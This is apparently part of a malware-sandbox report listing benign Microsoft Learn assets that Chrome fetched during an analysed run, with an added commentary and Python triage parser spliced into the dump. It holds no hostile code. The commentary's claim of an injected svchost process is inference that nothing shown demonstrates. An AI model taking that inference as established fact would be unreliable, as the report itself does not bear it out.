                                                                                                                                                                                                                                          SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                                                          SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                                                          Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):27868
                                                                                                                                                                                                                                          Entropy (8bit):5.155680085584642
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
                                                                                                                                                                                                                                          MD5:0A0F2E1CCB8E5F7C38CB11B101A8941F
                                                                                                                                                                                                                                          SHA1:112F4B7CB3DEDB9D9744CAC000E05DC949E89891
                                                                                                                                                                                                                                          SHA-256:DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
                                                                                                                                                                                                                                          SHA-512:9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                                                          Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
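Two things in the records above are worth pulling out programmatically rather than by eye. First, several SHA-256 values occur twice, once as "dropped" (the Chrome cache copy on disk) and once as "downloaded" (the network fetch with its URL), so a naive count overstates the number of distinct artifacts. Second, the learn.microsoft.com URL is the page the .NET Framework startup shim opens when a managed executable cannot locate its runtime, and its query string names the process that failed (processName=svchost.exe, shimver=4.0.30319.0), which ties this browser activity back to the injected process rather than to the user. The following parser is an added example and is not part of the Joe Sandbox report; SAMPLE is a constructed, shortened copy of four of the records on this page (same hashes, sizes and entropy values, previews cut to a few characters), and the 7.0 entropy threshold is an assumed triage cut-off, not a value the report uses.

```python
"""Parse Joe Sandbox dropped/downloaded file records (the Process/File Type/
Category/.../Preview key:value blocks) and answer three triage questions:
which records are the same bytes listed twice, what the .NET shim URL reveals,
and which files have packed/encrypted-looking entropy.

Added example, not part of the Joe Sandbox report. SAMPLE is a constructed,
shortened copy of records that appear on this page.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

SAMPLE = """\
Process:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
File Type:HTML document, ASCII text
Category:downloaded
Size (bytes):47062
Entropy (8bit):5.016149588804727
Encrypted:false
SHA-256:222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
Malicious:false
URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Preview:<!DOCTYPE html>
Process:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
File Type:ASCII text, with very long lines (65410)
Category:dropped
Size (bytes):207935
Entropy (8bit):5.420780972514107
Encrypted:false
SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
Malicious:false
Preview:/*! 1DS JSLL SKU
Process:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
File Type:ASCII text, with very long lines (65410)
Category:downloaded
Size (bytes):207935
Entropy (8bit):5.420780972514107
Encrypted:false
SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
Malicious:false
URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Preview:/*! 1DS JSLL SKU
Process:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):15427
Entropy (8bit):7.784472070227724
Encrypted:false
SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
Malicious:false
Preview:.PNG
"""


def parse_records(text):
    """Split the flat key:value dump into one dict per file.

    A new record starts at every 'Process:' line. Values such as 'C:\\...'
    and 'https://...' contain colons themselves, so split on the first one only.
    """
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        key, sep, value = line.partition(":")
        if not sep:
            continue  # blank or non-record line
        if key == "Process":
            cur = {}
            records.append(cur)
        if cur is not None:
            cur[key] = value
    return records


def group_by_hash(records):
    groups = defaultdict(list)
    for r in records:
        h = r.get("SHA-256")
        if h:
            groups[h.upper()].append(r)
    return groups


def same_content_pairs(records):
    """SHA-256 values that occur more than once, with the categories they
    appear under (typically the cache copy 'dropped' plus the 'downloaded' fetch)."""
    return {h: sorted(r.get("Category", "") for r in rs)
            for h, rs in group_by_hash(records).items() if len(rs) > 1}


def shim_query_params(records):
    """Query parameters of the .NET Framework 'application-not-started' page,
    which the runtime shim opens with the failing process name embedded."""
    for r in records:
        parts = urlsplit(r.get("URL", ""))
        if parts.netloc == "learn.microsoft.com" and parts.path.endswith("/application-not-started"):
            return {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {}


def high_entropy(records, threshold=7.0):
    """SHA-256 of files whose byte entropy is at or above the (assumed) threshold.
    Compressed formats like PNG score high too, so read this with File Type."""
    return [r["SHA-256"] for r in records
            if float(r.get("Entropy (8bit)", "0")) >= threshold]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records,", len(group_by_hash(recs)), "distinct SHA-256")
    print("duplicates:", same_content_pairs(recs))
    print("shim params:", shim_query_params(recs))
    print("high entropy:", high_entropy(recs))
```

Run it against a full report by replacing SAMPLE with the copied "Dropped Files" section; the parser only depends on each record beginning with a Process: line and on keys being separated from values by the first colon.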
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):15427
                                                                                                                                                                                                                                          Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                                          MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                                          SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                                          SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                                          SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:downloaded
Size (bytes):1432
Entropy (8bit):4.986131881931089
Encrypted:false
SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:6B8763B76F400DC480450FD69072F215
SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:false
URL:https://learn.microsoft.com/static/assets/0.4.029026183/global/deprecation.js
Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:downloaded
Size (bytes):464328
Entropy (8bit):5.0747157240281755
Encrypted:false
SSDEEP:6144:XegPrbKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:1KCerXyUh
MD5:875E7F3672FEC41DDB5A2386D2331531
SHA1:282979933E99BDE3A6342DC1EF93FBC51682F2C3
SHA-256:F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
SHA-512:67A3C1D8FF089E01C20962D96968DE43F3E8D49B474C396F08827EE891C0315693634E663D3148D7441B501EA6939A7D84A80B1E855B7C2A8BCB17E0013AFAD4
Malicious:false
URL:https://learn.microsoft.com/static/assets/0.4.029026183/styles/site-ltr.css

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (52717), with no line terminators
Category:dropped
Size (bytes):52717
Entropy (8bit):5.462668685745912
Encrypted:false
SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:413FCC759CC19821B61B6941808B29B5
SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:false

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (52717), with no line terminators
Category:downloaded
Size (bytes):52717
Entropy (8bit):5.462668685745912
Encrypted:false
SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:413FCC759CC19821B61B6941808B29B5
SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:false
URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:downloaded
Size (bytes):1173007
Entropy (8bit):5.503893944397598
Encrypted:false
SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:2E00D51C98DBB338E81054F240E1DEB2
SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:false
URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (46884)
Category:dropped
Size (bytes):1817143
Entropy (8bit):5.501007973622959
Encrypted:false
SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:F57E274AE8E8889C7516D3E53E3EB026
SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:false
                                                                                                                                                                                                                                          Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                          Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):13339
                                                                                                                                                                                                                                          Entropy (8bit):7.683569563478597
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                                                          MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                                                          SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                                                          SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                                                          SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):17174
                                                                                                                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):5644
                                                                                                                                                                                                                                          Entropy (8bit):4.785769732002188
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                                                          MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                                                          SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                                                          SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                                                          SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):17174
                                                                                                                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):13842
                                                                                                                                                                                                                                          Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                                          MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                                          SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                                          SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                                          SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                                                          Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (33273), with no line terminators
Category:dropped
Size (bytes):33273
Entropy (8bit):4.918756013698695
Encrypted:false
SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:86E84C732A96BF9CF18C99B48DB90B6D
SHA1:6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:false
